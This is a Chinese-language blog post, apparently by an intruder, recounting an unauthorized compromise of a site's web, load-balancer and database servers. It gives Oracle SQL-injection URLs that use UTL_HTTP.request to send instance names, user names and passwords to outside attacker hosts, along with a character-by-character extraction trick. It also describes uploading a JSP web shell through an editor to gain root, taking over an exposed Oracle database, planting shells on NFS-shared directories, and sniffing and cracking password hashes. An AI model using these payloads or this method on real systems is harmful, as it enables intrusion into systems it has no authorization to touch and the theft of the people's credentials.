记录一次搞站

原文已经发到了黑防10年，记录丢失了，原本是想发本身空间的 ，一直没发，如今从新搞一次，而后记录之，勿转，谢谢。



xx.xx.50.163 数据库 192.168.0.155 websa   搞定
TCP ports (6) 21,22,80,111,1521,8080

xx.xx.50.164 邮件1
TCP ports (6) 21,22,25,80,111,3306

xx.xx.50.165 邮件2
TCP ports (5) 21,22,25,53,3306

xx.xx.50.166  主站     192.168.0.152                    搞定
TCP ports (4) 21,22,80,111  
inet addr:  Bcast:192.168.0.255  Mask:255.255.255.0 


xx.xx.50.167 主站2  192.168.0.153  搞定
TCP ports (4) 21,22,80,111


具体也就很少说了，基本环境是redhat9+resin+jsp，主站端口21，22，80，111，rpc111端口貌似很容易出问题，研究了metasploit多久，都没找到一个合适的溢出。只能从网站入手。jsp网站其实也没多少办法，上传，注入，认证问题，jsp容器一些安全问题而已。最后突破口仍是注射点。

http://www.xxxx.net.cn/xxxx/work/firstpage/xx.jsp?type=%B4%F0%D2%C9index=180 and UTL_HTTP.request('xx.xx.72.103:80/'||(select instance_name from v$instance where rownum=1))=1--
and UTL_HTTP.request('xx.xx.142.5:80/'||(select Name from LRN_TEACHER_INFO where rownum=1))=1

不能union，能够nc反弹注射。固然有工具，我是不会动手的，不是我不会，是我懒，有工具我干吗要动手!!工具破解了大部分表，狠花了点时间。猜NAME字段的时候
用的是中文，工具跑不出来，这个地方就用到了oracle的substr和ascii函数。经过猜解名字字段的ascii，而后还原的方式破解除了用户名，我以为通篇文章这个地方是重点。呵呵。
http://www.xxxx.net.cn/xxxx/work/firstpage/xx.jsp?type=%B4%F0%D2%C9&index=180%20and%20UTL_HTTP.request('xx.xx.142.5:80/'||(select%20ascii(substr(Name,1,1))%20from%20LRN_TEACHER_INFO%20where%20rownum=1))=1
and UTL_HTTP.request('xx.xx.72.103:80/'||(select PASSWORD from LRN_TE_INFO where where NAME='xx'))=1--


LRN_XXX_INFO
 
ID NAME PASSWORD
0506  xx  123456

最后就破解出来了~拿到必定权限账号，进入后台，经过jsp的一个编辑器，上传jspshell，配置问题，resin的权限是root，直接root了。

LRN_XXX_INFO
 
ID NAME PASSWORD
0506  张俊俊  123456

进入以后，发现数据库链接是另外一个ip，oracle，网站和数据库分离的。
jspshell上的oracle链接器，链接不了，传说中的网上另外一个连oracle数据库的脚本也不行，resin配置文件中oracle的ip是内网ip陷入了尴尬。最后经过扫描同段
插一句，
先前搞了一个旁边的windows，ip信息为
 IP Address. . . . . . . . . . . . : xx.xx.50.169

   Subnet Mask . . . . . . . . . . . : 255.255.255.224 

   Default Gateway . . . . . . . . . : xx.xx.50.161

   DNS Servers . . . . . . . . . . . : xx.xx.96.68

                                       xx.xx.2.69
因此161-190为ip段

因此扫描161-190，开放1521的端口，仍是管理员配置问题，oracle端口暴露在外，经过本地链接的方式连上oracle，dba权限，赋java权限的方式拿下了数据库权限。

已经搞定主站，和数据库。

以前检测的时候，发现主站是作了负载均衡的，我在主站执行mount的时候，发现有外部加载，
192.168.0.153:/www/htdocs/webapps/xxxx/incoming on /www/htdocs/webapps/xxxx/incoming type nfs (rw,bg,addr=192.168.0.153)
192.168.0.153:/www/htdocs/webapps/xxxx/courseware on /www/htdocs/webapps/xxxx/courseware type nfs (rw,bg,addr=192.168.0.153)
192.168.0.153:/www/htdocs/webapps/xxxx/publish on /www/htdocs/webapps/xxxx/publish type nfs (rw,bg,addr=192.168.0.153)
192.168.0.153:/www/htdocs/webapps/xxxx/index.html on /www/htdocs/webapps/xxxx/index.html
正是负载均衡那台机器，
showmount -e 192.168.0.153
Export list for 192.168.0.153: /www/htdocs/webapps/xxxx/publish    192.168.0.* /www/htdocs/webapps/xxxx/incoming   192.168.0.* /www/htdocs/webapps/xxxx/courseware 192.168.0.* /www/htdocs/webapps/xxxx/index.html 192.168.0.*
而后经过主站jspshell，将马传到加载目录，而后经过访问ip的形式访问到了新上传的jspshell这个地方也是一个迷惑啊，搞的时候 ，上传了2个不一样的jsp马，来判断。最后我得出的结论是，网站前端的设备，经过dns轮循的方式作的负载，实际上这2台机器并无同步更新的。

好的如今搞定了主站，均衡站，数据库站，抓shadow来破，破不出来，原本想截取登陆密码的，个人那个替换ssh记录密码的，只对特定版本，就放过他了。

如今就还有一个邮件了。邮件ip只是多了一个3306，无奈，经过嗅探的方式，以前不是拿了一台通段的windows么，嗅探到了mysqlsha1的hash。呵呵。

网上的破解站没破出来，如今本身还在生表，包括8位数字小写字符的，48个g的，还有10来个表了，快了，不过破解出来的几率也应该不大。
破不鸟就放过你了 ，呵呵。